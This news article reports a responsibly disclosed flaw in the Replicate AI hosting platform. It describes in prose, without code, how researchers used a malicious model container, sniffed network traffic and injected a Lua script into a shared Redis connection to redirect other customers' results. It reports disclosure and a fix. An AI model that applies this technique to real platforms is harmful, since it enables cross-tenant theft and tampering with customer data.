Critical Vulnerability In AI-As-A-Service Provider Let Attackers Access Sensitive Data

In Cybersecurity News - Original News Source is cybersecuritynews.com by Blog Writer

Post Sharing

A critical vulnerability was found in the Replicate AI platform that could have exposed the private AI models and application data of all its customers.

The vulnerability stemmed from challenges in tenant separation, a recurring issue in AI-as-a-service platforms. 

By exploiting this, attackers could have gained unauthorized access to user prompts and the corresponding AI results, as the security flaw was responsibly disclosed to Replicate and promptly addressed, with no customer data compromised. 

Replicate, a platform for sharing AI models, allows users to upload containerized models using their Cog format, including a RESTful API server, potentially enabling malicious code execution. 

Remote Code Execution on Replicate’s infrastructure using a malicious Cog container.

Researchers created a malicious Cog container and uploaded it to Replicate, achieving remote code execution on Replicate’s infrastructure.

This highlights a potential vulnerability in AI-as-a-service platforms, where untrusted models can be a source of attacks. 

ANYRUN malware sandbox’s 8th Birthday Special Offer: Grab 6 Months of Free Service

Similar techniques were previously used to exploit Hugging Face’s managed AI inference service. 

Finding pre-established TCP connection via `netstat`.

An attacker gained root privileges within a container on Replicate’s Kubernetes cluster, as the container shared its network namespace with another container with an established connection to a Redis server. 

Pre-established TCP connection with Redis server in Replicate’s network.

By exploiting CAP_NET_RAW and CAP_NET_ADMIN, the attacker used tcpdump to identify the Redis connection, confirmed it was plaintext, and then aimed to manipulate the shared Redis queue to impact other replicate customers potentially. 

According to the Wiz Research Team, the attacker lacked credentials for direct access and devised a plan to inject packets into the existing authenticated connection. 

The authors exploited a vulnerability in a shared Redis server to gain unauthorized access to customer data by injecting TCP packets containing Redis commands to bypass authentication. 

While modifying existing entries in the Redis stream proved difficult due to its append-only nature, the authors were able to manipulate the data flow. 

They achieved this by injecting a Lua script that identified a specific customer request, removed it from the queue, altered the webhook field to point to a malicious server they controlled, and then reinserted the modified request back into the queue, which allowed them to intercept and potentially alter the prediction results sent back to the customer.

Lua script injected to Redis’ TCP stream.

A critical vulnerability in Replicate’s AI platform allowed attackers to potentially steal proprietary knowledge or sensitive data from customer models through malicious queries. 

Moreover, attackers could manipulate prompts and responses, compromising the models’ decision-making processes.

This vulnerability threatened the integrity of AI outputs and could have had severe downstream impacts on users who rely on those models. 

Free Webinar on Live API Attack Simulation: Book Your Seat | Start protecting your APIs from hackers